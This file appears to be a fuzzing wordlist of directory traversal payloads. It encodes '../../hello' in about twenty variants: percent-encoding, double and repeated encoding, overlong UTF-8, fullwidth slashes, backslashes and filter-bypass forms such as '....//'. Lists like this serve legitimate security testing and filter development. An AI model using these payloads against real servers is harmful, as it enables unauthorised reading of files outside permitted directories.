..%2F..%2Fhello
..%252F..%252Fhello
..%25252F..%25252Fhello
..%2525252F..%2525252Fhello
..%252525252F..%252525252Fhello
..%25252525252F..%25252525252Fhello
..%2F..%2Fhello
%2e%252F%2e%252Fhello
%252e%25252F%252e%25252Fhello
%25252e%2525252F%25252e%2525252Fhello
%2525252e%252525252F%2525252e%252525252Fhello
%252525252e%25252525252F%252525252e%25252525252Fhello
../../hello
..%c0%af..%c0%afhello
..%ef%bc%8f..%ef%bc%8fhello
..\..\hello
..%5c..%5chello
..%c0%5c..%c0%5chello
..%ef%bc%bc..%ef%bc%bchello
....//....//hello
..\/..\/hello
